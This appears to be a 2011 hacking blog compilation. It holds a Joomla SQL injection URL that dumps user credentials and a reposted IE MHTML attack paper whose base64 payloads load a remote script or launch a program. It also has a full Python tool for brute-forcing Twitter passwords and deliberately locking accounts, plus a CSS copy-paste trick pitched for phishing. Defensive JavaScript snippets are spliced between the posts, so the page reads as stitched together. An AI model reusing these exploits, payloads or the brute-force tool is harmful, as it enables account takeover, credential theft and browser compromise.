Friday, December 30, 2011

Joomla Component Jobprofile SQL INJECTION

FROM:1337day.com


Code:
[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011
 
[ Software Information ]
 
[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -
 
[ Vulnerable File ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
 
[ XpL ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
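The advisory's root cause is that `id` reaches the SQL query without being cast to an integer (the fix on the component side is an integer cast, e.g. Joomla 1.5's `JRequest::getInt`). From the defender's side, the same property gives a cheap detection rule: any `com_jobprofile` request whose `id` is not a plain integer is suspicious. The following is an added example, not part of the advisory, that applies that rule to constructed Apache-style access-log lines (the `findSuspicious`, `inspectLine` and `parseQuery` names are this example's own).

```javascript
// Added example (not from the advisory): flag com_jobprofile requests whose
// `id` parameter is anything other than a non-negative integer.
// The access-log lines below are constructed for this example.
const SAMPLE_LOG = [
  '10.0.0.5 - - [30/Dec/2011:10:01:02 +0000] "GET /index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=42 HTTP/1.1" 200 5120',
  '10.0.0.9 - - [30/Dec/2011:10:01:07 +0000] "GET /index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,2,3 HTTP/1.1" 200 6211',
  '10.0.0.9 - - [30/Dec/2011:10:01:09 +0000] "GET /index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1%27%20or%201%3D1 HTTP/1.1" 500 311',
  '10.0.0.7 - - [30/Dec/2011:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8800',
];

// Captures the request target from the quoted request line.
const REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/;

// Splits the query string into decoded key/value pairs.
function parseQuery(path) {
  const params = {};
  const qIndex = path.indexOf('?');
  if (qIndex === -1) return params;
  for (const pair of path.slice(qIndex + 1).split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const raw = eq === -1 ? '' : pair.slice(eq + 1);
    // '+' means space in a query string; tolerate malformed percent-escapes
    let value;
    try {
      value = decodeURIComponent(raw.replace(/\+/g, ' '));
    } catch (e) {
      value = raw;
    }
    params[key] = value;
  }
  return params;
}

// Returns null for lines that are not com_jobprofile requests carrying an id,
// otherwise the decoded id and whether it violates the integer-only rule.
function inspectLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  const params = parseQuery(m[1]);
  if (params.option !== 'com_jobprofile' || !('id' in params)) return null;
  const suspicious = !/^\d+$/.test(params.id);
  return { id: params.id, suspicious: suspicious };
}

// Collects the offending id values from a batch of log lines.
function findSuspicious(lines) {
  const hits = [];
  for (const line of lines) {
    const r = inspectLine(line);
    if (r && r.suspicious) hits.push(r.id);
  }
  return hits;
}

for (const id of findSuspicious(SAMPLE_LOG)) {
  console.log('suspicious id parameter: ' + JSON.stringify(id));
}
```

Matching on "the parameter is not an integer" rather than on `union select` keywords catches the encoded and obfuscated variants as well, and it mirrors exactly the check the component should have applied before building its query.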
 

Microsoft Internet Explorer MHTML Protocol Handler XSS

Hacking with mhtml protocol handler
 
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
 
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) was finally released yesterday. There are two articles about browser security [0x05 and 0x06]. If we combine both, we can complete a lot of interesting attacks...
 
1.Cross Site Scripting by upload mhtml file
 
Using the mhtml protocol handler, the file extension is ignored, so the attacker can rename the mhtml file to a *.jpg file, etc., then upload it to the target site...
 
Of course, we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions.
 
then use iframe tag src to it:
 

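Section 1 works because the handler ignores the file extension, so an extension check, or even a magic-byte check, does not stop a real JPEG with an MHTML body appended (the `copy /b` shape). The following is an added example, not part of the paper: Node.js code that scans the uploaded bytes for a `multipart/related` header together with its boundary delimiter and rejects the file regardless of its name. The sample buffers are constructed here (the `Content-Location:cookie` and `_boundary_by_mere` strings come from the paper's own mhtml fragment; the base64 body is a harmless constructed value), and `classifyUpload` is a hypothetical hook for an upload handler.

```javascript
// Added example (not from the paper): content-level detection of MHTML bodies
// hidden inside files uploaded under an image extension.

// MHTML announces itself with a multipart/related Content-Type carrying a boundary.
const MULTIPART_RE = /Content-Type:\s*multipart\/related;[^\r\n]*boundary="?([^"\r\n;]+)"?/i;

// Returns null if no MHTML structure is present, otherwise where it starts and
// which boundary it declares. Requires the opening "--boundary" line to follow,
// the same condition the handler needs before it will parse a part.
function findMhtmlPayload(buf) {
  // MHTML is line-oriented ASCII, so a latin1 view is enough to find the headers.
  const text = buf.toString('latin1');
  const m = MULTIPART_RE.exec(text);
  if (!m) return null;
  const boundary = m[1];
  const delimAt = text.indexOf('--' + boundary, m.index + m[0].length);
  if (delimAt === -1) return null;
  return { offset: m.index, boundary: boundary };
}

// Magic-byte check for the image types the upload form claims to accept.
function isImageMagic(buf) {
  if (buf.length < 4) return false;
  if (buf[0] === 0xff && buf[1] === 0xd8 && buf[2] === 0xff) return true;      // JPEG
  if (buf[0] === 0x89 && buf.toString('latin1', 1, 4) === 'PNG') return true;   // PNG
  if (buf.toString('latin1', 0, 4) === 'GIF8') return true;                     // GIF
  return false;
}

// Hypothetical upload hook: reject anything carrying an MHTML body, then fall
// back to the extension/magic consistency check.
function classifyUpload(name, buf) {
  const ext = name.split('.').pop().toLowerCase();
  const payload = findMhtmlPayload(buf);
  if (payload) {
    return {
      verdict: 'reject',
      reason: 'MHTML body at byte ' + payload.offset + ' inside .' + ext +
              ' file (boundary ' + payload.boundary + ')',
    };
  }
  if (['jpg', 'jpeg', 'png', 'gif'].includes(ext) && !isImageMagic(buf)) {
    return { verdict: 'reject', reason: 'extension does not match content' };
  }
  return { verdict: 'accept', reason: '' };
}

// Constructed samples: a JPEG/JFIF header, and the same header with an MHTML
// body appended, which is what "copy /b 1.jpg + 1.mhtml 2.jpg" produces.
const JPEG_HEAD = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00]);
const MHTML_TEXT =
  'Content-Type: multipart/related; boundary="_boundary_by_mere"\r\n' +
  '\r\n' +
  '--_boundary_by_mere\r\n' +
  'Content-Location:cookie\r\n' +
  'Content-Transfer-Encoding:base64\r\n' +
  '\r\n' +
  'PGI+aGFybWxlc3M8L2I+\r\n' +            // constructed body: base64 of "<b>harmless</b>"
  '--_boundary_by_mere--\r\n';
const POLYGLOT = Buffer.concat([JPEG_HEAD, Buffer.from(MHTML_TEXT, 'latin1')]);

console.log(classifyUpload('1.jpg', JPEG_HEAD));
console.log(classifyUpload('2.jpg', POLYGLOT));
```

Because the handler will parse the MIME headers from any offset, the scan has to cover the whole file rather than a fixed-size prefix. Serving user uploads from a separate, cookieless origin limits what such a file can do if one does slip through.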
 
2.Cross Site Scripting mhtml-file string injection
 
The mhtml file format is based only on CRLF, so if we can inject CRLF, the site may be attacked.
 
poc:
 
Test it on a Win7 system please.
 

 
On a Win XP or Win2k3 system, please do it with a second urlencode.
 
mhtml file string injection in JSON files: some sites restrict the JSON file's Content-Type to defend against XSS. Maybe we can use mhtml file string injection to pass it :)
 
3.bypass X-Frame-Options
 
X-Frame-Options does not protect against the mhtml protocol handler.
 
the demo:
 


 
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul
 
Billy (BK) Rios introduced a very interesting approach to steal local files at RuxCon/Baythreat (https://xs-sniper.com/blog/2010/12/17/will-it-blend/); it used "Script src to local files in the LocalLow directory" via file:// + Java applet + Adobe Reader + Adobe Flash to complete it. But if mhtml+file://uncpath is used, it is so easy to do.
 
Demo:
 
test it on win2k3+ie8+Adobe Reader 9
 
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
 
 
5.mhtml+file://uncpath+word == local xss vul
 
demo:http://www.80vul.com/mhtml/word.doc
 
Download it, save it as c:\word.doc and open it. You will get an alert with c:\boot.ini's content.
 
This is based on "Microsoft word javascript execution" (http://marc.info/?l=bugtraq&m=121121432823704&w=2).
 
To make the proof of concept, follow these steps:
 
1-Make an HTML file and paste the XSS code
2-Open the HTML file with Word and save it as c:\word.xml
3-Open word.xml with Notepad and inject the mhtml code in aaaaa
4-Rename c:\word.xml to c:\word.doc
5-Open the c:\word.doc file
 
xss code
---------------------------------------------------------


aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
If you use this vuln to attack someone, you need to know the Word file path where the downloaded file is saved, and lots of guys use the desktop :)
  
"Microsoft word javascript execution" only works on Office 2k3 and 2k7. In other versions you can make the link and src to http://www.80vul.com/hackgame/word.htm
 
update
Of course, this way may work on another file type like *.pdf via app.launchURL()
 
 
6. Cross Zone Scripting
 
First we would like to mention a very old vulnerability:
 

 
This vulnerability (by firebug9 [http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program in the "My Computer" zone. It has been tested and found to work on ie6/ie7/ie8 + win2k/winxp/win2k3.
 
Then repeat the "5.mhtml+file://uncpath+word == local xss vul" steps and change:
 
xss code
---------------------------------------------------------


aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
 
thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.
 
 
About Ph4nt0m Webzine
 
Ph4nt0m Webzine is a free network security magazine. We accept articles in English and Chinese; you are welcome to contribute.
mailto:root_at_ph4nt0m.org please. Thanks.

Admin login Page

Coded by ME

Admin login panel page



Code below



Code:





Crash_Override Admin Login










Crash_Override Admin Control Panel Login

Enter your username and pass (case sensitive)
Username:
Password:
 
COOKIES MUST BE ENABLED ON YOUR WEB BROWSER!
 

HTML maintenance page

Created by Crash_Override


Code:
 



Untitled Document


Starflower


Website is currently under construction

Note: Website will be up soon

Contact Administrators
Email:

We will contact you in the next 24 hours.

Minichat (php)

Minichat no MySQL need

Add the below code in your page:

PHP Code:
 
<button onmouseover="this.style.cursor='pointer'" onclick="send()"><img src="images/send.gif" width="133"></button><br>
<input style="background: black; color: white; text-align: center" onfocus="value=''" type="text" name="search" id="chat" value="">
<br>
<div id="frame1">
<iframe width="153" src="jkgh1g5h1j5gh12k5g21hk5gh5gf12tjf12cj125jyc2y5l6glug36gl36lg6gyk5f12yk1fgk515k125gyk251h125vh125kjhv51k.php"></iframe>
</div>
<script>
function send()
{
    var message = document.getElementById('chat').value;
    var meslen = document.getElementById('chat').value.length;
    if (meslen <= 0)
    {
        alert('Please, write the message.');
    }
    else if (meslen >= 81)
    {
        alert('Maximum characters in your messages must be 80');
    }
    else
    {
        // Reload the chat frame with the message in its URL. The opening <iframe> tag of
        // this line was lost in extraction; reusing the frame's .php file name and a
        // "message" query parameter are assumptions made to restore it.
        document.getElementById("frame1").innerHTML = '<iframe width="153" src="jkgh1g5h1j5gh12k5g21hk5gh5gf12tjf12cj125jyc2y5l6glug36gl36lg6gyk5f12yk1fgk515k125gyk251h125vh125kjhv51k.php?message=' + message + '"></iframe>';
    }
}
</script>
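The sender above concatenates the raw message into an `innerHTML` string, so a message containing a quote or an angle bracket breaks out of the `src` attribute and is parsed as markup in the page itself; the same unescaped value also reaches the PHP side, which must HTML-escape it before echoing it to other readers. The following is an added example, not the minichat author's code: it keeps the 80-character rule but percent-encodes the value and creates the frame through the DOM API, so the input never passes through an HTML parser. The `chat.php` endpoint and the `message` parameter are assumed names.

```javascript
// Added example (not the original minichat code): a sender that does not build
// HTML from user input. Validation and URL construction are separate functions
// so they can be exercised without a browser.
const CHAT_ENDPOINT = 'chat.php';   // assumed endpoint name
const MAX_LEN = 80;                 // the original's limit

// Returns {ok: true} or {ok: false, error: <text to show the user>}.
function validateMessage(message) {
  if (typeof message !== 'string' || message.trim().length === 0) {
    return { ok: false, error: 'Please, write the message.' };
  }
  if (message.length > MAX_LEN) {
    return { ok: false, error: 'Maximum characters in your messages must be ' + MAX_LEN };
  }
  return { ok: true };
}

// encodeURIComponent escapes quotes, angle brackets, '&' and '#', so the
// message cannot terminate the attribute or smuggle extra query parameters.
function buildChatUrl(message) {
  return CHAT_ENDPOINT + '?message=' + encodeURIComponent(message);
}

// Browser entry point. `doc` defaults to the global document; it is a parameter
// only so the function can be driven from outside a page.
function send(doc) {
  const d = doc || document;
  const message = d.getElementById('chat').value;
  const check = validateMessage(message);
  if (!check.ok) {
    alert(check.error);
    return false;
  }
  const frame = d.createElement('iframe');
  frame.width = '153';
  frame.src = buildChatUrl(message);     // set as a property, never via markup
  const container = d.getElementById('frame1');
  container.textContent = '';            // drop the old frame without parsing HTML
  container.appendChild(frame);
  return true;
}
```

The client-side encoding only protects the sender's own page; the server still has to treat `message` as untrusted data when it stores and renders it.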
 

twitter brute force (py)

CODE:
#!/usr/bin/python
# Toolname   : twitteater.py
# Programmer : gunslinger_ 
# my forum   : www.devilzc0de.org/forum
# Version    : v1.0
# This was written for educational purpose only. 
# Use this at your own risk.
# Author will be not responsible for any damage !
# I'm preffer using curl on system than using pycurl

import sys, time, StringIO, commands, re, os, random 

# Define variable
__programmer__ = "gunslinger_ "
__version__    = "1.0"
twittbird    = '''
   +++                    ++++  ++++       +++
  +++++                                 ++++  ++++        +++++
  +++++                                  ++   ++++        +++++
  ++++++++++++++  ++       ++      ++         ++++        +++++           ++++         ++++++
  ++++++++++++++ ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++++++++    ++++++++++
  +++++          ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++   +++++  ++++++++++
  +++++          ++++     ++++    ++++  ++++  ++++++++++  +++++++++    +++++++++++++ +++++
  +++++          ++++    ++++++   ++++  ++++  +++++       +++++        +++++++++++++ ++++
   ++++++++++++  ++++++ +++++++  +++++  ++++   +++++++++   +++++++++   ++++          ++++
    ++++++++++++  +++++++++++++++++++   ++++    +++++++++   ++++++++   +++++++++++   ++++
     ++++++++++     +++++++  ++++++     ++++     ++++++++    +++++++     ++++++++    ++++
     "The bird has been eaten by python snake..."
     
     Programmer : %s
     Version    : %s
     Twitter bruteforcer & freezer
''' % (__programmer__, __version__)

option           = '''
Usage  : %s [options]
Option : -u, --username            |   User for bruteforcing
         -w, --wordlist            |   Wordlist used for bruteforcing
     -s, --singlepass          |   Use single password (for update status only) 
     -d, --updatestatus             |   Post new status at given username        
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy             |   Set proxy will be use
         -t, --timeout             |   Set %s timeout request time (default : 15)
         -r, --refferer              |   Set %s refferer will be use (default : random)
         -f, --freeze                |   freeze user, user will be unable login for any minute
         -l, --log             |   Specify output filename (default : twitteater.log)
         -h, --help                    |   Print this help
                                                            
Example : 
     - bruteforcing mode  ~> %s -u brad@hackme.com -w wordlist.txt 
     - freeze mode          ~> %s -u brad@hackme.com -f
     - update status mode ~> %s -u brad@hackme.com -s hackmeifyoucan -d "Beware of Programmers who carry screwdrivers. -- Leonard Brandwein"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])

hme = '''
Usage : %s [option]
    -h or --help for get help''' % sys.argv[0]

refferer     = ['http://twitter.com/',
        'http://twitter.com/login',
        'http://twitter.com/about/contact',
        'http://blog.twitter.com/',
        'http://status.twitter.com/',
        'http://twitter.com/about',
        'http://twitter.com/about'
           ]

ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
freeze = False
upstat = False
brute = False
counter = 1
# warn , twitter will lock username after 17 x login attempt (tested)
maxlock = 18
verbocity = ''
proxy     = ''
background = ''
timeout      = '15'
statsurl  = 'http://twitter.com/statuses/update.xml'
credential = 'http://twitter.com/account/verify_credentials.xml'
green     = '\033[38m'
red     = '\033[31m'
reset     = '\033[0;0m'
log = "twitteater.log"
file = open(log, "a")

def helpme():
    print twittbird
    print option
    file.write(twittbird)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print twittbird
    print hme
    file.write(twittbird)
    file.write(hme)
    sys.exit(1)
        
for arg in sys.argv:
    if arg.lower() == '-u' or arg.lower() == '--user':
                username = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                brute = True
        elif arg.lower() == '-f' or arg.lower() == '--freeze':
                freeze = True
        elif arg.lower() == '-d' or arg.lower() == '--updatestatus':
            newstatus = sys.argv[int(sys.argv[1:].index(arg))+2]
            newstatus = newstatus.replace("_"," ")
                upstat = True
        elif arg.lower() == '-t' or arg.lower() == '--timeout':
                timeout = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-s' or arg.lower() == '--singlepass':
                password = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-r' or arg.lower() == '--refferer':
                refferer = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-p' or arg.lower() == '--proxy':
                proxy = '-x '+sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
            verbocity = "-v"
        elif arg.lower() == '-l' or arg.lower() == '--log':
            log = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
            helpme()
    elif len(sys.argv) <= 1:
        helpmee()

def updatestatus():
    
    trytwitter = 'curl -u %s:%s %s -d status=\"%s\" %s --connect-timeout %d -A \"%s\" %s' % (username, password, statsurl, newstatus, verbocity, int(timeout), random.choice(ouruseragent), proxy)
    restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
    updated = re.findall("", restwitter)
    duplicate = re.findall("Status is a duplicate.", restwitter)
    if verbocity == "-v":
        print restwitter
    if duplicate:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Duplicate status found\"")
        print "[*] Duplicate status is not accepted by twitter, please don't reduplicate it\n"
        file.write("\n[*] Duplicate status is not accepted by twitter, please don't reduplicate it!\n\n")
        sys.exit(1)
    if updated:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status successfully\"")
        print "[*] Update status : %s%s%s has been posted successfully ! \n" % (red, newstatus, reset)
        file.write("\n[*] Update status : %s has been posted successfully !\n\n" % (newstatus))
        sys.exit(1)
    else:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status failed\"")
        print "[*] password is wrong ! \n" 
        file.write("\n[*] password is wrong !\n\n")
        sys.exit(1)

def freezemode():
    global counter
    if freeze:
        print "[*] Trying to freeze account %s%s%s, user will be unable login for hour(s)" % (red, username, reset)
        file.write("\n[*] Trying to freeze account %s, user will be unable login for hour(s)" % (username))
        try:
            while counter <= maxlock:
                sys.stdout.write("\r[*] %s%d%s try has gived...                          " % (red, int(counter), reset))
                sys.stdout.flush()
                trytwitter = 'curl -u %s:freeze %s %s --connect-timeout %d' % (username, credential, verbocity, int(timeout))
                restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
                locked = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
                if locked:
                    os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account successfully freeze\"")
                    print "\n[*] Acount freeze %s%s%s succeded, and unable for login for %d seconds !" % (red, username, reset, int(locked[0]))
                    file.write("\n[*] Acount freeze %s succeded, and unable for login for %d seconds !\n\n" % (username, int(locked[0])))
                    sys.exit(1)
                if verbocity == "-v":
                    print restwitter
                counter = int(counter) + 1
        except KeyboardInterrupt:
            print "\n[-] Deactivated freezing mode\n"
            file.write("\n[-] Deactivated freezing mode\n")
            sys.exit(1)
        
def twitteater(word):
    global counter
    sys.stdout.write("\r[*] Trying %s is %s%d%s of %s%d%s                                  " % (word, red, int(counter), reset, red, len(words), reset))
    sys.stdout.flush()
    file.write("\n[*] Trying %s is %d of %d                                                \n" % (word, int(counter), len(words)))
         try:
        trytwitter = 'curl -u %s:%s %s -A "%s" %s -e %s --connect-timeout %d %s' % (username, word, credential, random.choice(ouruseragent), verbocity, random.choice(refferer), int(timeout), proxy)
        restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
        partwitter = re.findall("", restwitter)
        sick = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
        if sick:
            print "\n[*] Account %s%s%s has been freeze by twitter" % (red, username, reset)
            file.write("\n[*] Account %s has been freeze by twitter" % (username))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account has been freeze\"")
            sleeper = 0
            while sleeper <= int(sick[0]):
                sys.stdout.write("\r[*] Waiting %d second(s) for start bruteforcing again...           " % (int(sick[0])))
                sys.stdout.flush()
                sleeper = int(sleeper) + 1
                sick[0] = int(sick[0]) - 1
                time.sleep(1)
        if partwitter:
            print "\n[*] Account has been login successfully !"
            print "[*] Username : %s%s%s" % (red, username, reset)
            print "[*] Password : %s%s%s" % (red, word, reset)
            file.write("\n[*] Account has been login successfully !\n")
            file.write("[*] Username : %s\n" % (username))
            file.write("[*] Password : %s\n\n" % (word))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"login successfull !\"")
            sys.exit(1)
        if verbocity == "-v":
            print restwitter
    except KeyboardInterrupt:
        print "\n[-] Deactivated bruteforcing mode...\n"
        file.write("\n[-] Deactivated bruteforcing mode...\n")
        sys.exit(1)
    counter = int(counter) + 1
          
def bruteforcemode():
    global word        
    for word in words:
        twitteater(word.replace("\n",""))    

def main():
    global words
    print twittbird
    file.write(twittbird)
    print "[*] Starting attack at %s" % time.strftime("%X")
    file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
    if freeze:
        print "[*] %sFreeze%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Freeze mode activated")
    elif brute:
        print "[*] %sBruteforce%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] bruteforce mode activated")
    elif upstat:
        print "[*] %sUpdate status%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Update status mode activated")
    print "[*] Using PID : %s%s%s \n" % (red, os.getpid(), reset)
    file.write("\n[*] Using PID : %s \n" % (os.getpid()))
    if freeze:
        freezemode()
    if upstat:
        updatestatus()
    if brute:     
        try:
            preventstrokes = open(wordlist, "r")
            words            = preventstrokes.readlines()
            count          = 0 
            while count < len(words): 
                words[count] = words[count].strip() 
                count += 1 
        except(IOError): 
              print "\n[-] Error: Check your wordlist path\n"
            file.write("\n[-] Error: Check your wordlist path\n")
              sys.exit(1)
        bruteforcemode()
        twitteater(word)

    
if __name__ == '__main__':
    main()




Trick them with css (Copy past preventing)

Hello dudes, I will show you how you can fool someone if he tries to copy-paste your email address or any text on your lovely page.

Step 1

Add this (CSS) code into your page (internal or external, it's up to you)

PHP Code:
<style type="text/css">
.fooling {
  float: right;
  font-size: .001px;
  color: transparent;
  display: inline-block;
  width: 0px;
}
</style>
Step 2:

In the body, I will give you an example of what you could add (editable)

PHP Code:
my<span class="fooling">spam-</span>email@yahoo<span class="fooling">removed</span>.com
How does it look on your page?
It will look like this:

myemail@yahoo.com


Now, after he copy-pastes your email, he will get this:

myspam-email@yahooremoved.com

As you can see, copy-paste is not possible anymore; it copies the wrong text, & because I know how evil you are... you can simply trick him with your fake (phishing page link). Greetings ALBoRaaQ-TeAm
